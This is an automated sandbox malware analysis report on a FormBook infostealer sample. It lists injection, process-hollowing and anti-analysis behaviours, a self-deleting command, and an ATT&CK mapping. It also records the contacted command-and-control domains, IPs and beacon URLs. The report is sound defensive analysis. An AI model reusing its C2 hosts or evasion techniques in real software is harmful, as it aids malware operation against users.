          Source: C:\Windows\explorer.exeDomain query: www.best-cleaner.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeMemory written: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1340000
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: explorer.exe, 00000005.00000002.480271164.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery321Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412121 Sample: 457b22da_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.home-inland.com 2->31 33 www.boostcoachingonline.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 9 other signatures 2->49 11 457b22da_by_Libranalysis.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\...\457b22da_by_Libranalysis.exe.log, ASCII 11->29 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 67 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 11->67 15 457b22da_by_Libranalysis.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.thepocket-onlinelesson.xyz 202.210.8.86, 49730, 80 VECTANTARTERIANetworksCorporationJP Japan 18->37 39 rogegalmish.com 192.232.222.43, 49739, 80 UNIFIEDLAYER-AS-1US United States 18->39 41 12 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          457b22da_by_Libranalysis.exe32%ReversingLabsWin32.Trojan.Wacatac
          457b22da_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.457b22da_by_Libranalysis.exe.250000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.2.457b22da_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-0%Avira URL Cloudsafe
          www.rogegalmish.com/a8si/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.skynetaccess.com/a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl-0%Avira URL Cloudsafe
          http://www.thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-0%Avira URL Cloudsafe
          http://www.best-cleaner.com/a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl-0%Avira URL Cloudsafe
          http://servermanager.miixit.org/index_ru.htmlc0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.4520oceanviewavenue.com/a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl-0%Avira URL Cloudsafe
          http://www.omfgphil.com/a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://checkip.dyndns.org/0%Avira URL Cloudsafe
          http://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://servermanager.miixit.org/index_ru.html0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://servermanager.miixit.org/report/reporter_index.php?name=0%Avira URL Cloudsafe
          http://servermanager.miixit.org/10%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.boostcoachingonline.com/a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl-0%Avira URL Cloudsafe
          https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN0%Avira URL Cloudsafe
          http://servermanager.miixit.org/downloads/0%Avira URL Cloudsafe
          http://servermanager.miixit.org/hits/hit_index.php?k=0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          4520oceanviewavenue.com
          		184.168.131.241
          		truetrue
            		unknown
            home-inland.com
            		81.88.52.88
            		truetrue
              		unknown
              www.shirleyeluiz.com
              		34.95.69.141
              		truefalse
                		unknown
                rogegalmish.com
                		192.232.222.43
                		truetrue
                  		unknown
                  www.thepocket-onlinelesson.xyz
                  		202.210.8.86
                  		truetrue
                    		unknown
                    www.omfgphil.com
                    		64.98.145.30
                    		truetrue
                      		unknown
                      drisu-goalkeeping.com
                      		81.169.145.162
                      		truetrue
                        		unknown
                        boostcoachingonline.com
                        		184.168.131.241
                        		truetrue
                          		unknown
                          www.skynetaccess.com
                          		52.128.23.153
                          		truetrue
                            		unknown
                            www.best-cleaner.com
                            		156.252.96.189
                            		truetrue
                              		unknown
                              www.drisu-goalkeeping.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.boostcoachingonline.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.home-inland.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.tracisolomon.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.4520oceanviewavenue.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.rogegalmish.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.webdomoupravitel.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            www.rogegalmish.com/a8si/true
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.skynetaccess.com/a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.best-cleaner.com/a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.4520oceanviewavenue.com/a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.omfgphil.com/a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.boostcoachingonline.com/a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl-true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://servermanager.miixit.org/index_ru.htmlc457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tiro.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.carterandcone.comlexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://fontfabrik.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://servermanager.miixit.org/index_ru.html457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://servermanager.miixit.org/report/reporter_index.php?name=457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://servermanager.miixit.org/1457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.fonts.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdNrundll32.exe, 00000009.00000002.486836362.0000000004FD2000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://servermanager.miixit.org/downloads/457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://servermanager.miixit.org/hits/hit_index.php?k=457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        52.128.23.153
                                                                        		www.skynetaccess.comUnited States
                                                                        		19324DOSARRESTUStrue
                                                                        192.232.222.43
                                                                        		rogegalmish.comUnited States
                                                                        		46606UNIFIEDLAYER-AS-1UStrue
                                                                        202.210.8.86
                                                                        		www.thepocket-onlinelesson.xyzJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                        64.98.145.30
                                                                        		www.omfgphil.comCanada
                                                                        		32491TUCOWS-3CAtrue
                                                                        156.252.96.189
                                                                        		www.best-cleaner.comSeychelles
                                                                        		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                        34.95.69.141
                                                                        		www.shirleyeluiz.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        81.169.145.162
                                                                        		drisu-goalkeeping.comGermany
                                                                        		6724STRATOSTRATOAGDEtrue
                                                                        184.168.131.241
                                                                        		4520oceanviewavenue.comUnited States
                                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                        General Information

                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                        Analysis ID:412121
                                                                        Start date:12.05.2021
                                                                        Start time:12:23:27
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 10m 39s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:457b22da_by_Libranalysis (renamed file extension from none to exe)
                                                                        Cookbook file name:default.jbs
